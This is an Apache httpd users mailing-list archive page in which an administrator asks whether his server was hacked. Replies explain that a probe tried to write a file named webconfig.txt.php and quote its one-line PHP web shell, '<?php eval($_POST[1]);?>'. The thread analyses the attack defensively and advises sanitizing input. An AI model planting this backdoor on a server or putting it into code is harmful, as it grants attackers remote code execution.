Re: am i hacked ?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



I see these type of attack strings all the time on Nginx except Nginx gives a 403. Apache is notoriously bad with security and giving 200 ok responses makes you **** yourself. A reason  I and many other people have switched. User support on this list was also non existent when I ran into serious SSL problems with 2.4 that until today have been ignored and unanswered. 

On 06 Feb 2017 19:21, "Ken Robinson" <kenrbnsn@xxxxxxxxx> wrote:


On 2017-02-06 12:08 pm, Lentes, Bernd wrote:

The first line is trying to create the file webconfig.txt.php in your
DOCUMENT_ROOT directory, with the contents of the file being:

<?php eval($_POST[1]);?>

I didn't decode the remaining lines. I think they're just trying to do the same
thing.

Fortunately there is no webconfig.txt.php. And all folders in /srv/www belongs to root and user wwwrun
is not allowed to write there.

What seems to be happening here is that your system is being probed for vulnerabilities.

The attacker is sending a payload string to your index.php file in hopes that it will not complain and write the string to the file webconfig.txt.php which the attacker would then attempt to get to with the real hack in the Posted contents. Are there any requests to get to that file?

You should make sure you sanitized any input to your index.php and reject anything that's not expected.

Ken

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx


[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux